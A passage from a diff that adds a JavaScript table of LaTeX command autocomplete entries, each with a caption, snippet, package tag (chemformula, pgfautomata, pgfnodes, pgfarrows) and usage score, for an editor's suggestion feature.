}, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'chemformula-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'chemformula-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'chemformula-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'chemformula-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'chemformula-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'chemformula-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'chemformula-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'chemformula-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'chemformula-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'chemformula-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'chemformula-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'chemformula-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'chemformula-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'chemformula-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'chemformula-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'chemformula-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'chemformula-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'chemformula-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'chemformula-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'chemformula-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'chemformula-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'chemformula-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'chemformula-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'chemformula-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'chemformula-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'chemformula-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'chemformula-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'chemformula-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'chemformula-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'chemformula-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'chemformula-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'chemformula-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'chemformula-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'chemformula-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'chemformula-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'chemformula-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'chemformula-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'chemformula-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'chemformula-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'chemformula-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'chemformula-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'chemformula-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'chemformula-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'chemformula-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'chemformula-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'chemformula-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'chemformula-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'chemformula-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'chemformula-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'chemformula-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'chemformula-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'chemformula-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'chemformula-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'chemformula-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'chemformula-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'chemformula-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'chemformula-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'chemformula-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'chemformula-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'chemformula-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'chemformula-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'chemformula-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'chemformula-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'chemformula-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'chemformula-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'chemformula-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'chemformula-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'chemformula-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'chemformula-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'chemformula-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'chemformula-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'chemformula-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'chemformula-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'chemformula-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'chemformula-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'chemformula-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'chemformula-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'chemformula-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'chemformula-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'chemformula-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'chemformula-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'chemformula-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'chemformula-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'chemformula-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'chemformula-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'chemformula-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'chemformula-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'chemformula-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'chemformula-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'chemformula-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'chemformula-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'chemformula-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'chemformula-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'chemformula-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'chemformula-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'chemformula-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'chemformula-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'chemformula-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'chemformula-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'chemformula-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'chemformula-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'chemformula-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'chemformula-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'chemformula-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\sfrac{}{}', + snippet: '\\sfrac{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.0030164694688453453, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chemformula-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'chemformula-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'chemformula-cmd', + score: 0.0063276692758974925, + }, + ], + pgfautomata: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgfautomata-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfautomata-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfautomata-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgfautomata-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgfautomata-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgfautomata-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgfautomata-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgfautomata-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfautomata-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgfautomata-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfautomata-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgfautomata-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfautomata-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfautomata-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfautomata-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgfautomata-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfautomata-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfautomata-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfautomata-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfautomata-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgfautomata-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfautomata-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfautomata-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgfautomata-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgfautomata-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgfautomata-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgfautomata-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgfautomata-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfautomata-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgfautomata-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgfautomata-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfautomata-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgfautomata-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgfautomata-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgfautomata-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgfautomata-cmd', + score: 0.2864294797053033, + }, + ], + pgfnodes: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgfnodes-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfnodes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfnodes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgfnodes-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgfnodes-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgfnodes-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgfnodes-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgfnodes-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfnodes-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgfnodes-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfnodes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgfnodes-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfnodes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfnodes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfnodes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgfnodes-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfnodes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfnodes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfnodes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfnodes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgfnodes-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfnodes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfnodes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgfnodes-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgfnodes-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgfnodes-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgfnodes-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgfnodes-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfnodes-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgfnodes-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgfnodes-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfnodes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgfnodes-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgfnodes-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgfnodes-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgfnodes-cmd', + score: 0.2864294797053033, + }, + ], + pgfarrows: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgfarrows-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfarrows-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfarrows-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgfarrows-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgfarrows-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgfarrows-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgfarrows-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgfarrows-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfarrows-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgfarrows-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfarrows-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgfarrows-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfarrows-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfarrows-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfarrows-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgfarrows-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfarrows-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfarrows-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfarrows-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfarrows-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgfarrows-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfarrows-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfarrows-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgfarrows-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgfarrows-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgfarrows-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgfarrows-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgfarrows-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfarrows-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgfarrows-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgfarrows-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfarrows-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgfarrows-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgfarrows-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgfarrows-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: 